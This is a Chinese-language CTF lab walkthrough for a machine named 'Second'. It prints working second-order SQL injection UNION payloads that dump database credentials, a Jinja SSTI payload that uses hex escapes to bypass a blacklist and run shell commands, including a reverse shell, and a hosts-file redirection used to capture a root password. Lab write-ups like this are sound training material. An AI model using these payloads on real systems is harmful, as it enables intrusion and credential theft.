Second
排名第二并不是一件坏事,但在这种情况下并非如此。
端口扫描
循例nmap
Web枚举
进到8000
注册个账号进去,没啥用
二次注入
虽然登录框那里没有sql注入,但是可以尝试注册个非法账户名尝试二次注入
登录进去之后使用单词计数器
说明sql语句被执行了
直接利用,注册,这里爆出来回显点是2
' union select 1,2,3,4#-- -
接下来就是通过information_schema爆表爆字段
' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='website'#-- -
' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#-- -
' union select 1,group_concat(username,'||',password),3,4 from users#-- -
获得smokey的凭据
它可以登ssh
横向移动
在/opt/app下有一个flask
查看app.py看到服务开在5000端口,先转发出来
也是一样的登录框
查看源码发现它是直接把username插入页面,这意味着可以尝试SSTI
注册一个{ {1+1}}的用户名,登录得到了结果
虽然它有黑名单,但我们可以通过十六进制字符轻松绕过
payload:
{
{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
没问题,直接reverse shell
{
{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('/tmp/cmd')|attr('read')()}}
成功过来,同时拿到user flag
权限提升
note.txt
请尽快完成第二个项目现场。 确保 WAF 确实阻止了所有攻击,并且您使用正确的渲染模板来避免 SSTI。 你真的应该让你的网站像我的字计数器一样安全。
另外,我需要你在那个 PHP 站点上打气,我将登录以检查你的进度。
在/var/www下有个dev_site
传个pspy过去,发现有个定时任务
联系上面的note,那么smokey会定时带着凭据登录过去,但dev_site我们并没有权限修改
hosts有acl
查看acl发现hazel有写入权限
hosts里有那个域名,那么如果脚本通过域名请求,那么我们将可以直接修改hosts指向我们的攻击机
覆盖过去
内网还有一个8080端口,那个应该就是dev_site的了
本地端口转发直接转过来
wireshark抓包,得到凭据
这是root的密码,直接su过去
getroot